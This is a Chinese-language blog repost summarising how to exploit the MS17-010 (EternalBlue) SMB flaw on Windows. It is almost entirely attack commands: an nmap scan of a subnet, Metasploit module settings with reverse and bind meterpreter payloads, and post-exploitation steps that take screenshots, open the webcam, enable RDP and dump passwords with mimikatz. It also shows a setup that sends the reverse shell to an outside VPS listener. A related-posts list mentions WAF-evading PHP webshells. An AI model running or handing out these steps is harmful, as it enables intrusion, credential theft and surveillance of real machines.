1. 全栈程序员必看首页

MS17010漏洞利用总结

全栈程序员-站长 未分类 阅读 91

MS17010漏洞利用总结0x01常规打法扫描是否存在ms17-010漏洞:nmap-n-p445–scriptsmb-vuln-ms17-010192.168.1.0/24–openMSF常规漏洞利用:msf>useexploit/windows/smb/ms17_010_eternalbluemsf>setrhost192.168.1.112反向打:msf>setpayloadwindows/x64/meterpreter/reverse_tcpm

大家好,又见面了,我是你们的朋友全栈君。

0x01 常规打法

扫描是否存在ms17-010漏洞

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf > set rhost 192.168.1.112 
反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 
msf > set lhost 192.168.1.118
正向打:
msf > set payload windows/x64/meterpreter/bind_tcp

常用功能:

桌面抓图 
meterpreter > screenshot
视频开启 
meterpreter > webcam_scream
开启远程桌面 
meterpreter > run post/windows/manage/enable_rdp 
目标密码破解
第一步:载入mimikatz
meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
meterpreter >wdigest

0x02 反弹到VPS稳定打法

(常规打不好使的情况下。)

1.环境
vps 140.x.x.x
目标 192.168.3.123
本地kali 192.168.3.62

2.vps开启监听。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
exploit -j -z

在这里插入图片描述
3.kali下开始攻击。

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.3.123
set payload windows/x64/meterpreter/reverse_tcp
set lhost 140.x.x.x  #反弹到vps
set lport 443

在这里插入图片描述
run到下图界面Ctrl+C
在这里插入图片描述
4.vps收到meterpreter。(如果不稳定就多打几次)
在这里插入图片描述

0x03 目标为Win2003情况下稳定打

方法一(命令执行)

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

在这里插入图片描述
方法二(返回meterpreter)
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/131363.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • java 调用bapi_BAPI的简单实现步骤

    java 调用bapi_BAPI的简单实现步骤

    java 调用bapi_BAPI的简单实现步骤一,创建FunctionModule1,在SE11,创建需要的structure(必须为flat类型,否则会出现ReferenceparametersarenotallowedwithRFC)2,在SE80,建Functiongroup3,在SE37,创建FunctionModule(import的参数入药是value传值)Note:一个FunctionGroup只能包含一个B…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月24日
    4
  • QCustomPlot的基本使用[通俗易懂]

    QCustomPlot的基本使用[通俗易懂]

    QCustomPlot的基本使用[通俗易懂]QCustomPlot是QT下一个方便易用的绘图工具,只有两个文件qcustomplot.h和qcustomplot.cpp组成。源文件和使用文档可从官方网站下载。官方网站:http://www.qcustomplot.com/下面介绍下基本使用:1、将qcustomplot.cpp和qcustomplot.h拷贝到工程目录下,并在工程中添加文件。并在工程的pro文

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月25日
    8
  • ireport使用_result with

    ireport使用_result with

    ireport使用_result with1.问题:IReport如何实现变量字段$F{propertyName}赋值为一个NULL对象时不显示”null”,而显示为空白?解决方法:选中动态单元格,右键选择属性,在弹出对话框TextField选项卡中选中Blankwhennull。思考:以往我们为IReport中变量字段赋值时会在程序或报表Textfieldexpression中用三目符号去判空,用I…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年10月21日
    4
  • 深入浅出玩转php一句话(含过waf新姿势)

    深入浅出玩转php一句话(含过waf新姿势)

    深入浅出玩转php一句话(含过waf新姿势)本帖最后由sucppVK于2017-1-914:39编辑一、前言本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载!各个论坛出了不少过waf的一句话可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀)今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。让小白从彻底理解马的含义,到打造属于自己过waf的马。—-

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月21日
    119
  • Wireshark抓包详解[通俗易懂]

    Wireshark抓包详解[通俗易懂]

    Wireshark抓包详解[通俗易懂]简述wireshark是非常流行的网络封包分析工具,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。使用wireshark的人必须了解网络协议,否则就看不懂wireshark了。为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。 wireshark能获取HTTP,也能获取HTTPS,但是不能解密HTTPS,所以wireshar

    全栈程序员-站长的头像 全栈程序员-站长
    2025年9月25日
    7
  • 几款国产开源的Windows界面库

    几款国产开源的Windows界面库

    几款国产开源的Windows界面库vchelp2013-3-212:10:47阅读(3972)评论(0)上次介绍的几款图形界面库http://blog.okbase.net/vchelp/archive/23.html都是国外的开源项目,今天介绍的几款都是国人的开源项目,大部分是采用DirectUI设计思想。 1. 炫彩界面库XCGUI炫彩界面库不仅是界面库,它是软件界面开发框架,让用户开发

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月26日
    4

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号